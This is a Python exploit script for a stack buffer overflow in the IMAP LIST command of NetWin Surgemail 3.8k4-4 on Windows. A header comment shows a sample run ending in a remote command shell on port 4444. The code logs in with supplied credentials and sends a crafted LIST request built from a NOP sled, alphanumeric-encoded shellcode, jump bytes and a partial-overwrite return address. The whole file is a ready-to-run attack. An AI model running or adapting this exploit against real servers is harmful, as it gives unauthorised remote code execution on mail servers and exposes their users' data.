netwin-list.txt

`#!/usr/bin/python  
###############################################################################  
#  
# NetWin Surgemail 0DAY (IMAP POST AUTH) Remote LIST Universal Exploit   
# Discovered and coded by Matteo Memelli aka ryujin   
# http://www.gray-world.net http://www.be4mind.com  
#  
# Affected Versions : Version 3.8k4-4 Windows Platform  
# Tested on OS : Windows 2000 SP4 English  
# Windows XP Sp2 English  
# Windows 2003 Standard Edition Italian  
# Discovery Date : 03/13/2008  
#  
#-----------------------------------------------------------------------------  
#  
# Thx to muts _[at]_ offensive-security.com   
# for the "Partial Overwrite" Suggestion :) Now I know it works!  
#  
#-----------------------------------------------------------------------------  
##############################################################################  
#  
# matte@badrobot:~/surgemail$ ./surgemail_list.py -H 192.168.1.245 -P 143 -l \  
# test -p test  
#  
# [*********************************************************************]  
# [* *]  
# [* NetWin Surgemail 0DAY (IMAP POST AUTH) Remote LIST Exploit *]  
# [* Discovered and Coded By *]  
# [* Matteo Memelli *]  
# [* (ryujin) *]  
# [* www.be4mind.com - www.gray-world.net *]  
# [* *]  
# [*********************************************************************]  
# [+] Connecting to imap server...  
# * OK IMAP ryujin (Version 3.8k4-4)  
#  
# [+] Logging in...  
# 0001 OK LOGIN completed  
#  
# [+] PWNING IN PROGRESS :) ...  
# [+] DONE! Check your shell on 192.168.1.245:4444  
# matte@badrobot:~/surgemail$ nc 192.168.1.245 4444  
# Microsoft Windows XP [Version 5.1.2600]  
# (C) Copyright 1985-2001 Microsoft Corp.  
#  
# c:\surgemail>ipconfig  
# ipconfig  
#  
# Windows IP Configuration  
#  
#  
# Ethernet adapter Local Area Connection:  
#  
# Connection-specific DNS Suffix . :   
# IP Address. . . . . . . . . . . . : 192.168.1.245  
# Subnet Mask . . . . . . . . . . . : 255.255.255.0  
# Default Gateway . . . . . . . . . : 192.168.1.197  
#  
# c:\surgemail>  
#  
##############################################################################  
  
from socket import *  
from optparse import OptionParser  
import sys, time  
  
print "[*********************************************************************]"  
print "[* *]"  
print "[* NetWin Surgemail 0DAY (IMAP POST AUTH) Remote LIST Exploit *]"  
print "[* Discovered and Coded By *]"  
print "[* Matteo Memelli *]"   
print "[* (ryujin) *]"   
print "[* www.be4mind.com - www.gray-world.net *]"  
print "[* *]"  
print "[*********************************************************************]"  
usage = "%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD"  
parser = OptionParser(usage=usage)  
parser.add_option("-H", "--target_host", type="string",  
action="store", dest="HOST",  
help="Target Host")  
parser.add_option("-P", "--target_port", type="int",  
action="store", dest="PORT",  
help="Target Port")  
parser.add_option("-l", "--login-user", type="string",  
action="store", dest="USER",  
help="User login")  
parser.add_option("-p", "--login-password", type="string",  
action="store", dest="PASSWD",  
help="User password")  
(options, args) = parser.parse_args()  
HOST = options.HOST  
PORT = options.PORT  
USER = options.USER  
PASSWD = options.PASSWD  
if not (HOST and PORT and USER and PASSWD):  
parser.print_help()  
sys.exit()  
  
NOPES = "\x90"*9654  
SJUMP = "\xEB\xF9\x90\x90" # Jmp Back  
NJUMP = "\xE9\xDD\xD7\xFF\xFF" # And Back Again Baby ;)   
# Partial Overwrite: 0x00 not allowed in buffer and all poppopret  
# begin with 0x00 in surgemail.exe   
RET = "\x7e\x51\x78"   
SHELLCODE = (  
#[*] x86/alpha_mixed succeeded, final size 697  
"\x89\xe0\xd9\xeb\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x49\x49"  
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"  
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"  
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"  
"\x4c\x43\x5a\x4a\x4b\x50\x4d\x4d\x38\x4b\x49\x4b\x4f\x4b\x4f"  
"\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x46\x44\x4c\x4b\x50"  
"\x45\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x44\x38\x45\x51\x4a\x4f"  
"\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"  
"\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x50\x31"  
"\x49\x50\x4c\x59\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49"  
"\x51\x48\x4a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47\x4b"  
"\x50\x54\x51\x34\x47\x58\x44\x35\x4a\x45\x4c\x4b\x51\x4f\x46"  
"\x44\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b"  
"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x43\x33\x46\x4c\x4c\x4b\x4b"  
"\x39\x42\x4c\x51\x34\x45\x4c\x43\x51\x48\x43\x46\x51\x49\x4b"  
"\x43\x54\x4c\x4b\x51\x53\x50\x30\x4c\x4b\x51\x50\x44\x4c\x4c"  
"\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51\x4e"  
"\x43\x58\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x4e"  
"\x36\x42\x46\x46\x33\x43\x56\x42\x48\x47\x43\x46\x52\x45\x38"  
"\x44\x37\x44\x33\x46\x52\x51\x4f\x46\x34\x4b\x4f\x4e\x30\x45"  
"\x38\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x48\x56"  
"\x51\x4f\x4d\x59\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58\x45"  
"\x52\x46\x35\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x45\x38\x48\x59"  
"\x45\x59\x4a\x55\x4e\x4d\x46\x37\x4b\x4f\x49\x46\x51\x43\x46"  
"\x33\x50\x53\x51\x43\x51\x43\x50\x43\x50\x53\x47\x33\x46\x33"  
"\x4b\x4f\x48\x50\x45\x36\x45\x38\x42\x31\x51\x4c\x43\x56\x51"  
"\x43\x4d\x59\x4d\x31\x4a\x35\x45\x38\x4e\x44\x45\x4a\x42\x50"  
"\x48\x47\x46\x37\x4b\x4f\x49\x46\x43\x5a\x42\x30\x46\x31\x46"  
"\x35\x4b\x4f\x4e\x30\x43\x58\x49\x34\x4e\x4d\x46\x4e\x4b\x59"  
"\x46\x37\x4b\x4f\x48\x56\x50\x53\x51\x45\x4b\x4f\x4e\x30\x43"  
"\x58\x4b\x55\x50\x49\x4b\x36\x47\x39\x51\x47\x4b\x4f\x48\x56"  
"\x46\x30\x50\x54\x46\x34\x46\x35\x4b\x4f\x4e\x30\x4d\x43\x45"  
"\x38\x4a\x47\x42\x59\x48\x46\x44\x39\x50\x57\x4b\x4f\x4e\x36"  
"\x50\x55\x4b\x4f\x4e\x30\x43\x56\x42\x4a\x42\x44\x45\x36\x45"  
"\x38\x45\x33\x42\x4d\x4b\x39\x4d\x35\x43\x5a\x50\x50\x46\x39"  
"\x51\x39\x48\x4c\x4c\x49\x4d\x37\x42\x4a\x51\x54\x4b\x39\x4d"  
"\x32\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x47\x32\x46\x4d"  
"\x4b\x4e\x47\x32\x46\x4c\x4d\x43\x4c\x4d\x43\x4a\x46\x58\x4e"  
"\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x48\x33\x42\x36"  
"\x4b\x4f\x43\x45\x47\x34\x4b\x4f\x48\x56\x51\x4b\x50\x57\x51"  
"\x42\x50\x51\x46\x31\x46\x31\x42\x4a\x43\x31\x46\x31\x50\x51"  
"\x51\x45\x46\x31\x4b\x4f\x48\x50\x43\x58\x4e\x4d\x4e\x39\x43"  
"\x35\x48\x4e\x50\x53\x4b\x4f\x4e\x36\x42\x4a\x4b\x4f\x4b\x4f"  
"\x50\x37\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4c\x43\x49"  
"\x54\x45\x34\x4b\x4f\x49\x46\x51\x42\x4b\x4f\x48\x50\x45\x38"  
"\x4a\x4f\x48\x4e\x4d\x30\x45\x30\x51\x43\x4b\x4f\x49\x46\x4b"  
"\x4f\x4e\x30\x44\x4a\x41\x41")  
  
s = socket(AF_INET, SOCK_STREAM)  
print " [+] Connecting to imap server..."  
s.connect((HOST, PORT))  
print s.recv(1024)  
print " [+] Logging in..."  
s.send("0001 LOGIN %s %s\r\n" % (USER, PASSWD))  
print s.recv(1024)  
print " [+] PWNING IN PROGRESS :) ..."  
EVIL = NOPES + SHELLCODE + NJUMP + SJUMP + RET  
s.send('0002 LIST () "/' + EVIL + '" "PWNED"\r\n')  
print " [+] DONE! Check your shell on %s:%d" % (HOST, 4444)  
s.close()  
  
`